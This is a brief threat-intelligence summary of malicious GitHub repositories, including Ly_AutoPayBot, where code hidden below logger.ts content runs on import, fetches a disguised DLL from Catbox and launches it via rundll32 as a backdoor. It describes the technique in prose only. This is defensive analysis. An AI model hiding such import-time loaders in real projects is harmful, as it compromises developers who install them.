ENKI analyzed GitHub repositories where an actor posing as a full-stack and blockchain developer hid malicious scripts inside apparently legitimate projects. In the Ly_AutoPayBot repository, malicious code was concealed far below the visible logger.ts content and executed whenever the module was imported, downloading a disguised DLL from Catbox and launching it through rundll32. The DLL backdoor created multiple threads, used IOCP-based HTTP POST communication with its C&C server, generated an infected-host identifier from the volume GUID path, and protected C&C data and internal strings with Base64 and MT19937-based routines. The excerpt explicitly notes that North Korean IT workers have used fake LinkedIn and GitHub developer profiles for revenue and information theft, but it does not claim the analyzed GitHub actor is North Korean or Lazarus-linked.